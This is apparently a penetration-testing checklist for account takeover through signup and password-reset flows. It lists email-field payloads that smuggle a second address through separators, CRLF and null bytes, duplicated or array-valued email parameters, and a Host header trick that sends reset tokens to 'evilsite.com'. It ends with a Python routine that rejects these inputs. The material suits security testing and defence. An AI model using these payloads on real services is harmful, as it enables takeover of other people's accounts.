ATO
Through Email Replacing when Registering Account (testing/abuse email filter)
email@email.com,victim@hack.secry
email@email","victim@hack.secry
email@email.com:victim@hack.secry
email@email.com%0d%0avictim@hack.secry
%0d%0avictim@hack.secry
%0avictim@hack.secry
victim@hack.secry%0d%0a
victim@hack.secry%0a
victim@hack.secry%0d
victim@hack.secry%00
victim@hack.secry{{}}
Example Request:
name=HACKER&email=HACKER@wearehackerone.com&email=victim@hack.secry&username=hackerz&password=THIS_ISPASSWORD_TO_TAKEOVER&password-confirmation=THIS_ISPASSWORD_TO_TAKEOVER&_csrf_token=XXX7139a5209c08aec2dbff06f5ab5XXXXXXXXXX
Through Parameter Pollution in Reset Password
POST /passwordReset
[…]
email=victim@yahoo.com&email=hacker@yahoo.com
or in JSON:
{"email":["andrew@hotmail.com","hacker@gmail.com"]}
Through OTP Code Bruteforce
Through Host Header Injection
The victim then receives the reset email in which the link carrying the "token" points at "evilsite.com", so when the user clicks it the "token" is logged/extracted in the evilsite.com server log.
Using Separator in Value of the Parameter
Try a value with no domain in the parameter to take over the account
Try an email value with no TLD in the parameter
Try re-signing up using the same email
If the request carries JSON data, add a comma and input your hacker email
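Server-side handling that closes the classes listed above (multi-address and control-byte payloads, repeated or array-valued email parameters, and reset links derived from the Host header), added here as an example and not part of the original checklist; the strict address allowlist and the configured RESET_BASE_URL are assumptions:

```python
import json
import re
from urllib.parse import parse_qsl

# Deliberately strict allowlist (an assumption, narrower than RFC 5322):
# exactly one local part, one domain with a TLD, and none of the
# separators or control bytes from the payload list (, : " { } CR LF NUL).
EMAIL_RE = re.compile(r"[A-Za-z0-9._+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}")

# Constructed origin; a real service reads it from configuration so the
# reset link never depends on the attacker-controllable Host header.
RESET_BASE_URL = "https://accounts.example.test"


def extract_single_email(body, content_type):
    """Return the single email in a register/reset body, or None.

    None means reject: repeated email= keys (parameter pollution), a JSON
    array or object instead of a string, or a value the allowlist refuses.
    """
    if content_type == "application/json":
        try:
            data = json.loads(body)
        except ValueError:
            return None
        if not isinstance(data, dict):
            return None
        value = data.get("email")
    else:
        # parse_qsl percent-decodes, so %0d%0a and %00 become real control
        # bytes here and are then rejected by the allowlist below.
        values = [v for k, v in parse_qsl(body, keep_blank_values=True)
                  if k == "email"]
        if len(values) != 1:
            return None
        value = values[0]
    if not isinstance(value, str) or not EMAIL_RE.fullmatch(value):
        return None
    return value.lower()


def reset_link(token):
    """Build the password-reset URL from the configured origin only."""
    return f"{RESET_BASE_URL}/passwordReset?token={token}"
```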